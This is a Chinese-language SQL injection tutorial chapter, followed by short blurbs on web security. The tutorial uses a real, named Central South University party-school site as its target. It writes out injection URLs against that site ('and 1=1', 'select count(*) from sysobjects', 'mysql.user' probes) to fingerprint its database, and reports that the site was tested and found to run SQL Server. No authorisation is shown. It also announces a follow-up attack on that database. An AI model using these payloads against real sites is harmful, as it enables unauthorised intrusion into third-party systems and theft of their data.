我们接着讲对数据库系统表的攻击 。
我们还是以中南大学党校管理系统为例子。
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and 1=1
如果后台是有漏洞的 后台代码如下写
String id=request.getparameter("id");
select * from table where id = id;
那么此时得到的id 为 41 and 1=1
执行的sql语句为
select * from table where id=41 and 1=1
这种情况id=41存在的话。那么where后面的语句总是执行为对的。
首先我们攻击的第一步需要知道它是什么类型的数据库
access 的msysobjects 这个在默认情况下不能访问
sql server 的sysobjects 在默认情况下可以访问
mysql 的user 在默认情况下可以访问
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0
如何执行这个的效果和不加select count(*) 语句出现的页面效果一致的话,那么此系统为sqlserver。
后台的sql语句执行代码如下
select * from table where id=41 and (select count(*) from sysobjects) >0
那么此时where条件成立则和id=41出现的页面是一致的。
而如果
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0
和
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from msysobjects )>0
都执行不成功的话,那么则考虑是不是access 。
如果执行下述代码成功的话,则为mysql
mysql> select * from admin where (select count(*) from mysql.user)>0;
+----+-------+-------+
| id | name | pwd |
+----+-------+-------+
| 1 | admin | admin |
+----+-------+-------+
1 row in set (0.12 sec)
也就是url写成
http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from mysql.user )>0
这种情况下返回的页面还和id=41一样的话那么。则此系统为mysql 。
中南大学党校管理管理系统经测试是用sqlserver做数据库的。
其实,我们根据经验可以想想 。现在国内70%以上的网站是用asp做的。而asp是微软做的。此外。access和sqlserver也都是微软做的。所以的话我们根据这个依据。有理由相信asp页面的关联数据库是access和sqlserver两个中的一个。而不是非微软制造的mysql。
如果是php页面那么我们就考虑mysql。而如果是jsp的话,那么考虑mysql的情况也是比较多的。
这一章讲了如何查看该网站所使用的数据库类型。
下节讲就对sqlserver数据库进行攻击。
分享到:
相关推荐
SQL注入是一种常见的网络安全问题,它发生在应用程序不恰当地处理用户输入的数据时,导致数据库查询语句的结构被破坏,从而使攻击者能够执行恶意SQL命令。本文将深入探讨SQL注入的原理、危害、检测方法以及防范策略...
通过深入了解SQL注入的原理和技术,不仅可以帮助开发者避免编写存在漏洞的应用程序,还可以增强网络安全意识,提高防御能力。随着技术的发展,防范SQL注入的方法也在不断进步,比如使用参数化查询、存储过程等技术...
SQL注入是IT安全领域一个不容忽视的问题,它威胁着各种基于Web的应用程序的安全性。开发者和运维人员应该充分了解SQL注入的原理,掌握检测和防范的技巧,以保护系统免受此类攻击。同时,持续关注最新的安全动态,...
数据泄露已经成为当前安全领域的一大焦点问题,特别是在通信技术迅速发展,大数据、云计算和物联网广泛应用的背景下,信息交换的频繁使得网络安全的重要性日益凸显。虽然现有的安全措施,如数据传输安全、上网行为...
《社交网络——Discord的阴暗面》 在数字化时代,社交网络已...总的来说,尽管Discord提供了许多便利,但其网络安全问题不容忽视。通过深入理解渗透测试和常见漏洞,我们可以更好地保护自己,享受更安全的在线体验。
最后,勒索软件的威胁不容忽视。云电商平台应建立强大的备份和恢复机制,以防数据被加密锁定,同时加强员工的安全意识培训,避免点击可疑链接或下载不明附件,降低被感染的风险。 总的来说,云电商平台的数据安全是...
8. **安全性**:考虑到网络聊天系统的敏感性,安全问题不容忽视。这包括数据加密、防止SQL注入、用户验证等,开发者需了解基本的安全防护措施。 9. **系统架构设计**:一个好的系统设计需要考虑到扩展性和可维护性...
本文将探讨云时代游戏的发展趋势以及与之相关的网络安全问题。 首先,云技术的应用极大地推动了游戏行业的创新。通过云集群网络数据中心,游戏开发者可以利用强大的计算能力,处理海量的数据,实现复杂的游戏逻辑和...
除此之外,Web安全知识也不容忽视,如防止SQL注入、XSS跨站脚本攻击和CSRF跨站请求伪造等。此外,了解如何使用HTTPS进行加密通信,保护用户隐私和数据安全,也是现代Web开发者的必备技能。 最后,持续集成/持续部署...
然而,容器的安全性是不容忽视的问题。这份文档可能讨论了如何在运行时保护容器,包括容器镜像的验证、网络隔离、资源限制、权限管理和日志监控等方面。容器安全实践旨在防止恶意攻击,确保数据安全,并遵循最佳的...
然而,随着技术的发展,网络安全问题日益突出,尤其是针对WAP网站的安全威胁不容忽视。本资料集“wap建站安全知识详解”深入探讨了这一领域,旨在帮助开发者和管理员了解并实施有效的安全策略,保护其WAP站点免受...
安全性是在线考试系统不容忽视的一环。ASP.NET提供了身份验证和授权机制,例如Forms Authentication和角色管理,确保只有授权的用户才能访问特定资源。此外,为了防止SQL注入和跨站脚本攻击,还需要正确处理用户输入...
9. **安全性考虑**:在实际部署和运行论坛时,安全问题不容忽视。源码中可能涉及到防止SQL注入、XSS攻击、CSRF攻击等措施,通过学习可以提升安全防护意识和能力。 10. **扩展性与可维护性**:优秀的源码应具备良好...
6. **端点安全**:在AI应用广泛分布的环境中,端点安全不容忽视。确保每个设备和连接点的安全,防止恶意软件入侵,是构建安全网络环境的关键。 7. **安全管理**:有效的安全管理包括策略制定、风险评估、安全审计和...
由于ASP网站可能面临SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等问题,开发者需对源码进行安全审计,应用最佳实践,例如参数化查询、输入验证、文件上传安全控制等,以增强系统的安全性。 总之,ASP网站CMS程序...
文章还可能涵盖了其他组件安全的实践方法,如防止SQL注入、处理权限请求的最佳实践、代码混淆以增加反编译难度、使用安全的网络通信库以及及时更新依赖库以修复已知漏洞等。 总之,Android软件的安全开发需要全面...
本书会教导读者如何预防SQL注入、跨站脚本攻击(XSS)等常见的Web安全威胁,以及如何实施最佳的密码策略、输入验证和输出编码,以保护用户数据和服务器安全。 此外,书中的示例代码和完整应用实例不仅展示了PHP和...
ASP源码可能包含了防止SQL注入和XSS攻击的防护措施,比如参数化查询和输入验证,以确保系统免受恶意攻击。 在实际应用中,这个网络教学评判系统可能还集成了其他功能,如用户权限管理、消息通知、数据分析等。这些...
同时,安全问题不容忽视,比如数据加密传输、权限控制以及防SQL注入等措施都是必须考虑的。 综上所述,HM排序程序是一个集成数据库操作和网络通信的实用工具,它在卡片序列号管理中发挥着关键作用。理解并掌握其...